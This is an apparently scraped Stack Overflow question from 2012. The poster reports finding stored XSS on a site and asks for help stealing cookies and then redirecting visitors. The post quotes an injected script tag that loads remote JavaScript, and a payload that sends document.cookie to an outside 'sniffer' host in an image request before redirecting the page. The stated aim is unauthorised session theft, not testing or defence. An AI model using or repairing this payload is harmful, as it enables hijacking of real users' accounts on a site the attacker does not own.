Xss redirect and cookies

Posted by user1824906 on Stack Overflow See other posts from Stack Overflow or by user1824906
Published on 2012-11-21T22:56:28Z Indexed on 2012/11/21 22:59 UTC
Read the original article Hit count: 287

Filed under:
|
|
|

I found Active XSS on one site. I need to steal cookies and after it to make redirect on other site. This site has a non-frame protection I tried to put "><script src='http://site.ru/1.js' /></script>"

http://site.ru/1.js contains:

img = new Image(); img.src = "http:/sniffer.com/nasdasdnu.gif?"+document.cookie;
    var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
    var speed = 100;
    function reload() {
    document.location = URL
    }
    setTimeout("reload()", speed);

But it doesn't work=\ Any help?

© Stack Overflow or respective owner

Related posts about JavaScript

Related posts about redirect